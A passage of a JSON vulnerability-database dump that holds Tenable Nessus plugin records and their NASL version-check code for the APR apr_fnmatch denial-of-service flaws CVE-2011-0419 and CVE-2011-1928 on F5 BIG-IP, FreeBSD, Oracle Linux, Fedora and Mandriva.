"cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL15920.NASL", "href": "https://www.tenable.com/plugins/nessus/80108", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL15920.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80108);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/10\");\n\n script_cve_id(\"CVE-2011-0419\");\n script_bugtraq_id(47820);\n\n script_name(english:\"F5 Networks BIG-IP : Apache vulnerability (SOL15920)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Stack consumption vulnerability in the fnmatch implementation in\napr_fnmatch.c in the Apache Portable Runtime (APR) library before\n1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in\nlibc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle\nSolaris 10, and Android, allows context-dependent attackers to cause a\ndenial of service (CPU and memory consumption) via *? sequences in the\nfirst argument, as demonstrated by attacks against mod_autoindex in\nhttpd.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K15920\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL15920.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL15920\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"11.0.0-11.6.0\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"10.0.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"11.0.0-11.6.0\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"10.0.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.0.0-11.6.0\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"10.0.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"11.0.0-11.6.0\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"10.0.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"11.0.0-11.6.0\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"10.0.0-10.2.4\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.0.0-11.4.1\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"10.0.0-10.2.4\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.0.0-11.3.0\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"10.0.0-10.2.4\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.0.0-11.3.0\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:11", "description": "The Apache Portable Runtime Project reports :\n\nReimplement apr_fnmatch() from scratch using a non-recursive algorithm; now has improved compliance with the fnmatch() spec.", "cvss3": {}, "published": "2011-11-14T00:00:00", "type": "nessus", "title": "FreeBSD : Apache APR -- DoS vulnerabilities (38560d79-0e42-11e1-902b-20cf30e32f6d)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apr0", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_38560D790E4211E1902B20CF30E32F6D.NASL", "href": "https://www.tenable.com/plugins/nessus/56805", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56805);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-0419\");\n\n script_name(english:\"FreeBSD : Apache APR -- DoS vulnerabilities (38560d79-0e42-11e1-902b-20cf30e32f6d)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache Portable Runtime Project reports :\n\nReimplement apr_fnmatch() from scratch using a non-recursive\nalgorithm; now has improved compliance with the fnmatch() spec.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.apache.org/dist/apr/Announcement0.9.html\"\n );\n # https://vuxml.freebsd.org/freebsd/38560d79-0e42-11e1-902b-20cf30e32f6d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1f4c6c3b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apr0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apr0<0.9.20.0.9.19\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-27T14:13:34", "description": "From Red Hat Security Advisory 2011:0507 :\n\nUpdated apr packages that fix one security issue are now available for Red Hat Enterprise Linux 4, 5, and 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache Portable Runtime (APR) is a portability library used by the Apache HTTP Server and other projects. It provides a free library of C data structures and routines.\n\nIt was discovered that the apr_fnmatch() function used an unconstrained recursion when processing patterns with the '*' wildcard. An attacker could use this flaw to cause an application using this function, which also accepted untrusted input as a pattern for matching (such as an httpd server using the mod_autoindex module), to exhaust all stack memory or use an excessive amount of CPU time when performing matching. (CVE-2011-0419)\n\nRed Hat would like to thank Maksymilian Arciemowicz for reporting this issue.\n\nAll apr users should upgrade to these updated packages, which contain a backported patch to correct this issue. Applications using the apr library, such as httpd, must be restarted for this update to take effect.", "cvss3": {}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 4 / 5 / 6 : apr (ELSA-2011-0507)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:apr", "p-cpe:/a:oracle:linux:apr-devel", "p-cpe:/a:oracle:linux:apr-docs", "cpe:/o:oracle:linux:4", "cpe:/o:oracle:linux:5", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2011-0507.NASL", "href": "https://www.tenable.com/plugins/nessus/68275", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:0507 and \n# Oracle Linux Security Advisory ELSA-2011-0507 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68275);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0419\");\n script_xref(name:\"RHSA\", value:\"2011:0507\");\n\n script_name(english:\"Oracle Linux 4 / 5 / 6 : apr (ELSA-2011-0507)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:0507 :\n\nUpdated apr packages that fix one security issue are now available for\nRed Hat Enterprise Linux 4, 5, and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache Portable Runtime (APR) is a portability library used by the\nApache HTTP Server and other projects. It provides a free library of C\ndata structures and routines.\n\nIt was discovered that the apr_fnmatch() function used an\nunconstrained recursion when processing patterns with the '*'\nwildcard. An attacker could use this flaw to cause an application\nusing this function, which also accepted untrusted input as a pattern\nfor matching (such as an httpd server using the mod_autoindex module),\nto exhaust all stack memory or use an excessive amount of CPU time\nwhen performing matching. (CVE-2011-0419)\n\nRed Hat would like to thank Maksymilian Arciemowicz for reporting this\nissue.\n\nAll apr users should upgrade to these updated packages, which contain\na backported patch to correct this issue. Applications using the apr\nlibrary, such as httpd, must be restarted for this update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-May/002132.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-May/002133.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-May/002138.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected apr packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apr-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4 / 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"apr-0.9.4-25.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"apr-devel-0.9.4-25.el4\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"apr-1.2.7-11.el5_6.4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"apr-devel-1.2.7-11.el5_6.4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"apr-docs-1.2.7-11.el5_6.4\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"apr-1.3.9-3.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"apr-devel-1.3.9-3.el6_0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apr / apr-devel / apr-docs\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:51", "description": "Various bug fixes since 1.4.2.\n\nSecurity: CVE-2011-0419 Reimplement apr_fnmatch() from scratch using a non-recursive algorithm; now has improved compliance with the fnmatch() spec.\n\nNote: 1.4.3 was never officially released.\n\nRelease -2 should fix top_builddir problem from -1.\n\nFix CVE-2011-1928 introduced in 1.4.4.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2011-06-03T00:00:00", "type": "nessus", "title": "Fedora 15 : apr-1.4.5-1.fc15 (2011-6750)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:apr", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2011-6750.NASL", "href": "https://www.tenable.com/plugins/nessus/54944", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-6750.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(54944);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_bugtraq_id(47820, 47929);\n script_xref(name:\"FEDORA\", value:\"2011-6750\");\n\n script_name(english:\"Fedora 15 : apr-1.4.5-1.fc15 (2011-6750)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Various bug fixes since 1.4.2.\n\nSecurity: CVE-2011-0419 Reimplement apr_fnmatch() from scratch using a\nnon-recursive algorithm; now has improved compliance with the\nfnmatch() spec.\n\nNote: 1.4.3 was never officially released.\n\nRelease -2 should fix top_builddir problem from -1.\n\nFix CVE-2011-1928 introduced in 1.4.4.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=703390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=706203\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-June/060984.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1cafd315\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-June/061125.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cff54d88\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected apr package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:apr\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/06/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"apr-1.4.5-1.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apr\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:15", "description": "It was discovered that the fix for CVE-2011-0419 under certain conditions could cause a denial-of-service (DoS) attack in APR (CVE-2011-1928).\n\nPackages for 2010.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more:\nhttp://store.mandriva.com/product_info.php?cPath=149 products_id=490\n\nThe updated packages have been patched to correct this issue.\n\nUpdate :\n\nPackages for Mandriva Linux 2010.0 were missing with the MDVSA-2011:095 advisory.", "cvss3": {}, "published": "2011-05-23T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : apr (MDVSA-2011:095-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64apr-devel", "p-cpe:/a:mandriva:linux:lib64apr1", "p-cpe:/a:mandriva:linux:libapr-devel", "p-cpe:/a:mandriva:linux:libapr1", "cpe:/o:mandriva:linux:2010.0"], "id": "MANDRIVA_MDVSA-2011-095.NASL", "href": "https://www.tenable.com/plugins/nessus/54610", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2011:095. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(54610);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-1928\");\n script_bugtraq_id(47929);\n script_xref(name:\"MDVSA\", value:\"2011:095-1\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apr (MDVSA-2011:095-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the fix for CVE-2011-0419 under certain\nconditions could cause a denial-of-service (DoS) attack in APR\n(CVE-2011-1928).\n\nPackages for 2010.0 are provided as of the Extended Maintenance\nProgram. Please visit this link to learn more:\nhttp://store.mandriva.com/product_info.php?cPath=149 products_id=490\n\nThe updated packages have been patched to correct this issue.\n\nUpdate :\n\nPackages for Mandriva Linux 2010.0 were missing with the\nMDVSA-2011:095 advisory.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64apr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64apr1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libapr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libapr1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/23\");\n 